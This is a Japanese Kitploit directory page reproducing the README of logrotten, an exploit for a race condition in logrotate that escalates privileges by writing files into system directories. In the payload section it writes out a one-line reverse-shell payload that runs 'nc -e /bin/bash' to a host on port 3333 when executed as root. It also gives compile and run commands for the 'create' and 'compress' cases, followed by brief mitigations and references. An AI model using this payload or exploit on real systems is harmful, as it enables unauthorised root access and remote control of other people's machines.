Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
logrotten — 任意のファイル(リバースシェルペイロードなど)をシステムディレクトリに書き込むことで権限昇格を可能にするLogrotateの競合状態エクスプロイト。 | Kitploit
ツール/GitHubGitHub/whotwagner/logrotten
特権昇格脆弱性分析エクスプロイトポストエクスプロイトペネトレーションテストレッドチーミングバイナリエクスプロイト
GitHubwhotwagner/logrotten

logrotten

任意のファイル(リバースシェルペイロードなど)をシステムディレクトリに書き込むことで権限昇格を可能にするLogrotateの競合状態エクスプロイト。

リポジトリを見る
2112638ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

[!WARNING]
このリポジトリは https://codeberg.org/whotwagner/logrotten に移動しました。最新の更新については、新しい場所をご覧ください。

logrotate のレースコンディションを利用した権限昇格

Logrotten Logo

簡単な説明

  • logrotate はログファイルのリネーム後にレースコンディションが発生しやすい。
  • logrotate が root として実行され、(create、copy、compress など)ファイルを作成するオプションが設定され、ユーザーがログファイルのパスを制御できる場合、レースコンディションを悪用して任意のディレクトリにファイルを書き込むことが可能。
  • 攻撃者は "/etc/bash_completition.d/" などのディレクトリにリバースシェルを書き込むことで権限を昇格できる可能性がある。

権限昇格の前提条件

  • Logrotate が root として実行されている
  • ログパスが攻撃者の制御下にある
  • logrotate の設定でファイルを作成するオプションが設定されている

テスト済みバージョン

  • Debian GNU/Linux 11 (bullseye)
  • Debian GNU/Linux 9.5 (stretch)
  • Amazon Linux 2 AMI (HVM)
  • Ubuntu 18.04.1
  • logrotate 3.8.6
  • logrotate 3.11.0
  • logrotate 3.15.0
  • logrotate 3.18.0

コンパイル

  • gcc -o logrotten logrotten.c

ペイロードの準備

root@kitploit:~
echo "if [ `id -u` -eq 0 ]; then (/bin/nc -e /bin/bash myhost 3333 &); fi" > payloadfile

エクスプロイトの実行

logrotate.cfg で "create" オプションが設定されている場合:

root@kitploit:~
./logrotten -p ./payloadfile /tmp/log/pwnme.log

logrotate.cfg で "compress" オプションが設定されている場合:

root@kitploit:~
./logrotten -p ./payloadfile -c -s 4 /tmp/log/pwnme.log

既知の問題

  • docker コンテナや lvm2 ボリューム内でレースに勝利するのは困難でした。このバージョンの logrotten は信頼性を向上させています。

緩和策

  • ログパスが root によって所有されていることを確認する
  • logrotate.cfg で "su" オプションを使用する
  • selinux または apparmor を使用する

著者

  • Wolfgang Hotwagner

参考文献

  • https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
  • https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
  • https://github.com/whotwagner/logrotten
  • https://www.ait.ac.at/themen/cyber-security/ait-sa-20190930-01/
  • https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd
ツールをダウンロード